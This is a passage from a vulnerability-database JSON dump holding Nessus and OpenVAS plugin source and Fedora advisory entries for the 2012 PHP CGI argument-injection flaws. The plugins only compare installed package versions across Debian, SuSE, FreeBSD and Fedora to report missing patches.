reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3-7+squeeze9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:13:50", "description": "This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in php5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n bnc#753778", "edition": 18, "published": "2012-05-09T00:00:00", "title": "SuSE 10 Security Update : PHP5 (ZYPP Patch Number 8114)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2012-05-09T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-MOD_PHP5-8114.NASL", "href": "https://www.tenable.com/plugins/nessus/59053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59053);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"SuSE 10 Security Update : PHP5 (ZYPP Patch Number 8114)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in php5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n bnc#753778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1172.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8114.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-mod_php5-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-bcmath-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-bz2-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-calendar-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ctype-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-curl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-dba-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-dbase-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-devel-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-dom-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-exif-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-fastcgi-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ftp-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-gd-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-gettext-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-gmp-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-hash-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-iconv-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-imap-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-json-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ldap-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mbstring-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mcrypt-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mhash-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mysql-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ncurses-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-odbc-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-openssl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pcntl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pdo-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pear-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pgsql-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-posix-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pspell-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-shmop-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-snmp-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-soap-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sockets-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sqlite-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-suhosin-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sysvmsg-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sysvsem-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sysvshm-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-tokenizer-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-wddx-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-xmlreader-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-xmlrpc-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-xsl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-zlib-5.2.14-0.32.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:01", "description": "The PHP Development Team reports :\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\nvulnerability in CGI-based setups as originally described in\nCVE-2012-1823. (CVE-2012-2311)\n\nNote: mod_php and php-fpm are not vulnerable to this attack.\n\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\napache_request_headers() (CVE-2012-2329).", "edition": 22, "published": "2012-05-14T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (59b68b1e-9c78-11e1-b5e0-000c299b62e1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php53", "p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php52"], "id": "FREEBSD_PKG_59B68B1E9C7811E1B5E0000C299B62E1.NASL", "href": "https://www.tenable.com/plugins/nessus/59084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59084);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\", \"CVE-2012-2329\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (59b68b1e-9c78-11e1-b5e0-000c299b62e1)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP Development Team reports :\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\nvulnerability in CGI-based setups as originally described in\nCVE-2012-1823. (CVE-2012-2311)\n\nNote: mod_php and php-fpm are not vulnerable to this attack.\n\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\napache_request_headers() (CVE-2012-2329).\"\n );\n # https://vuxml.freebsd.org/freebsd/59b68b1e-9c78-11e1-b5e0-000c299b62e1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e50f899\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP apache_request_headers Function Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5>5.4<5.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php53<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php52<5.2.17_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-05-27T01:52:21", "published": "2012-05-27T01:52:21", "id": "FEDORA:089FC20F0D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.13-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2012-05-27T07:21:55", "published": "2012-05-27T07:21:55", "id": "FEDORA:B599720F97", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-eaccelerator-0.9.6.1-9.fc15.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2012-05-27T01:52:21", "published": "2012-05-27T01:52:21", "id": "FEDORA:2174220F39", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-eaccelerator-0.9.6.1-9.fc16.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2012-05-27T01:52:21", "published": "2012-05-27T01:52:21", "id": "FEDORA:11BE720F24", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: maniadrive-1.2-32.fc16.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-05-27T07:21:55", "published": "2012-05-27T07:21:55", "id": "FEDORA:A24AB20F77", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-5.3.13-1.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2012-05-27T07:21:55", "published": "2012-05-27T07:21:55", "id": "FEDORA:ACED120F82", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: maniadrive-1.2-32.fc15.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2329"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-05-26T07:21:09", "published": "2012-05-26T07:21:09", "id": "FEDORA:9729C2155E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.3-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2329"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2012-05-26T07:21:09", "published": "2012-05-26T07:21:09", "id": "FEDORA:A07AD21BF1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: maniadrive-1.2-40.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2386"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-07-02T22:31:44", "published": "2012-07-02T22:31:44", "id": "FEDORA:42AD9212FB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.14-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2386", "CVE-2012-2688"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-08-05T21:22:14", "published": "2012-08-05T21:22:14", "id": "FEDORA:8819720FCC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.15-1.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-01-06T13:06:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of php", "modified": "2018-01-04T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864257", "href": "http://plugins.openvas.org/nasl.php?oid=864257", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora 15\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\");\n script_id(864257);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:57 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7567\");\n script_name(\"Fedora Update for php FEDORA-2012-7567\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.13~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-01-31T18:41:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-12-13T00:00:00", "id": "OPENVAS:1361412562310850218", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850218", "type": "openvas", "title": "openSUSE: Security Advisory for update (openSUSE-SU-2012:0590-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: 